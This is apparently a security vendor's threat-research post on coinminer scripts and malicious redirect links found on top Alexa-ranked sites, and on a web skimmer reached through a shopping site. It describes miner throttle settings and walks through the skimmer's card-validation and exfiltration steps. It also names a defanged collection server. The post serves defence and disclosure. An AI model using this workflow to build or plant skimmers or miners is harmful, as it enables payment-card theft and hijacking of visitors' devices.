Top Alexa Sites Infected With Malicious Coinminers and Web Skimmer

Clock Icon 8 min read

This post is also available in: 日本語 (Japanese)

Executive Summary

Unit 42 recently launched a threat hunting campaign among the top 10,000 websites globally on Alexa. Alexa rankings are a measure of website popularity, based on visitor interactions and number of visits. We found four sites that were affected, as outlined in Table 1. In the analysis that follows, we describe the malicious activity in more detail, covering malicious coinminers, which hijack CPU resources to mine cryptocurrency; malicious external links, which direct users to malicious sites; and a web skimmer attack, which is designed to steal payment card details from checkout forms.

Affected Domain Affected Type Attack Type Alexa Rank (as of June 15, 2020) Site Type
libero[.]it Malicious External Link Malicious Coinminer 607 The number one website in Italy, offers various types of content and services: webmail, search engine, news and more.
pojoksatu[.]id Compromised Site Malicious Coinminer 1494 News website in Indonesia.
www[.]heureka[.]cz Malicious External Link Web Skimmer 5204 The largest e-commerce platform in Central and Eastern European markets.
zoombangla[.]com Compromised Site Malicious Coinminer 6579 News website in Bangladesh.

Table 1. Summary of affected top Alexa sites.

Palo Alto Networks customers are protected from the aforementioned threats by the URL Filtering and Threat Prevention cloud-delivered security subscriptions.

Compromised Sites

Malicious Coinminers

Coinhive was a browser mining service that offered a JavaScript miner for the Monero blockchain. It shut down in March 2019, in part because it was widely abused by cybercriminals. There are two websites still serving Coinhive’s miner script. One is coinhive.min.js and the other is JSEcoin. Figure 1, below, shows the commands issued to start the coinminer on a compromised website – zoombangla[.]com.

The source on a compromised website, zoombangla[.]com, shows commands used to start malicious coinminers and set parameters for them, including how much of a victim's CPU it will utilize.
Figure 1. Commands to start the Coinhive miner with defined parameters.
This miner can control how it utilizes the user’s CPU and how many threads it uses for mining. The coinminer can also control how much of a target’s CPU it’s using. The available options for parameters are shown in Table 2. Oddly, the above codes configured the miner to rapidly drain the battery of an infected device, perhaps because the attackers felt a need to make the most use possible of any successfully compromised victims. Most attackers ensure a compromised device’s power usage stays low to avoid detection and continue making money illicitly. However, in this case, it appears the attackers rushed to mine and did not configure it correctly.


Throttle CPU usage limit to
0 (Default) 100%
0.3 80%
0.5 50% - 70%

Table 2. Parameter throttle and CPU usage map.

Another example of the commands to start the Coinhive mining script is shown below, from a different website we found serving it – pojoksatu[.]id.

The source on a compromised website, pojoksatu[.]id, shows default commands used to start malicious coinminers.
Figure 2. Commands to start the Coinhive miner with default parameters.
Once a user visits either of the above sites, the coinmining script would automatically run and start mining for the attacker. The user’s CPU load would increase as shown in Figure 3.

An example of CPU load activity when affected by malicious coinminers.
Figure 3. CPU load activity

Overall, we found more than 60 URL pages injected with Coinhive mining scripts in pojoksatu[.]id and zoombangla[.]com. Details are in the Appendix.

Malicious External Links

External link security has become increasingly important. As email services have improved at spotting spam and other types of malicious messages, attackers are using open redirects with external links instead. If attackers publish a malicious URL in a post on a legitimate website, likely very few visitors would find it suspicious. If users click on the link – or even hover over it to check it first – they will see the valid website in the link, but they will end up at a malicious site the attacker wants to redirect them to. The user would then be infected with some sort of malware, such as a malicious coinminer, or their personal information may be stolen.

Figure 4 is a legitimate used car website on libero[.]it where you can search and compare vehicles. Attackers inserted malicious links into car advertisements, which redirected visitors interested in the vehicle to a malicious site that injected them with the JSEcoin coinmining script, as shown in Figures 5-7. Please note that the JSEcoin platform closed down on April 4, 2020. The scripts will still run, but the attackers aren't able to collect coins from it anymore.

This shows an example of how attackers can insert malicious external links into compromised websites, such as the legitimate used car website shown here.
Figure 4. External link in libero[.]it, which would redirect visitors to compromised sites.
The source page would look like this:

This image shows all the external links, which are highlighted, pointing to libero[.]it. Though the link appears legitimate, clicking it redirects the user to a malicious site.
Figure 5. Source codes of the page containing malicious links.
As you can see in Figure 5, all the external links, which are highlighted, point to libero[.]it. If you want to know more about the car, you would need to click the link. Then you would be redirected to the malicious site.

The areas highlighted in red show how the redirect chain works, taking a user from a legitimate website to a malicious site.
Figure 6. Redirect chain.

This site is where the malicious coinminer is injected.

This shows the source of www.clicautosate[.]it, where commands start the JSEcoin malicious coinminer.
Figure 7. Commands to start the JSEcoin miner.

Web Skimmer

A web skimmer attack, also known as e-skimming or Magecart attacks, are a type of attack where a payment page on a website is compromised and injected with malicious code in order to steal payment card details when they are entered into checkout forms.

The example we found among top-ranked websites on Alexa stems from another external link security issue. heureka[.]cz itself is an online shopping website. If you search Anti-COVID products (which are the top search keywords on the website) on the site, it will show a list of related products.

This is an example of anti-COVID products on a top-ranked website on Alexa. Issues with external link security open the user up to attacks when looking through these popular product lists.
Figure 8. Product example.

There is one store listed after this product, and you can choose to buy from this store.

This shows a link in heureka[.]cz which apparently advertises anti-COVID products, but actually redirects the user to compromised sites.
Figure 9. Link in heureka[.]cz to compromised sites.
The source page looks like this:

Source code of the page on heureka[.]cz containing malicious links, which are highlighted.
Figure 10. Source code of the page containing malicious links, which are highlighted.
Once you click to visit this store, you would be redirected to the malicious site.

The areas highlighted in red show how the user is redirected from a legitimate website to a malicious site.
Figure 11. Redirect chain.

And unfortunately, the entire site is full of obfuscated malicious skimmer scripts, as shown in Figure 12.

In the case we're examining, the malicious site the user is redirected to is full of obfuscated malicious skimmer scripts. Because they're obfuscated, it's hard to predict what behavior they cause.
Figure 12. Obfuscated skimmer codes.

The above codes are obfuscated, making it hard to predict what behavior they cause. We had to deobfuscate the codes first. We then found the following functions, which are stealthy as they monitor a user’s input of their payment card information and send it out to the remote attacker server.

This function is used to validate a credit card number with the Luhn Algorithm, which is widely used to validate a variety of identification numbers, such as credit card numbers.

This is the beginning of the skimmer. It would run every 99 seconds to call the function XYRUDR. Function XYRUDR would find all the tags in [input, select, form, button, a, img].

It would set the “mousedown” event listener for the aforementioned tags.

Once the event triggers, it would call this function to get the value of the tag.

This function is used to send credit card information out to the collection server.

To recap, the skimmer work flow is:

  1. Add event listener for [input, select, form, button, a, img].
  2. When a number string passes credit card validation checks, it sends the information out.
  3. Construct the collection server URL and parameters, then send the information out.

A successful attack would send all the user information to the remote attacker server, including credit card number, address, etc.

Collection Server: metahtmlhead[.]com

Collection server: metahtmlhead[.]com. The section outlined in red shows credit card information collected during the web skimmer attack being sent to the collection server.
Figure 13. Credit card information being sent to the collection server.

URL Filtering Analysis

The pie chart shows how the visits to affected sites that we observed are distributed in terms of geolocation. While most visits came from Western Europe, a substantial portion of visits also originated from the Eastern and Western U.S.
Figure 14. URL Filtering customer geolocation distribution.


This figure shows the general geographic distribution of visits to the affected sites that we observed. While most visitors clearly came from Western Europe, visitors from the Eastern U.S. and Western U.S. are not far behind. This graph indicates a broad spectrum of potential victims all across the globe.


Our research highlights that users need to exercise caution, even when visiting popular, apparently reputable websites. These are the same sites likely to generate the most income for attackers focused on malicious coinmining and web skimming. When users click a link away from a core site, they should pay attention to the full URL of the site where they end up to ensure it’s where they expected to be. A simple way to avoid malicious coinminers is to have your browser and system fully patched with endpoint security installed.

Palo Alto Networks customers are protected from the mentioned threats by the URL Filtering and Threat Prevention cloud-delivered security subscriptions.













































































Enlarged Image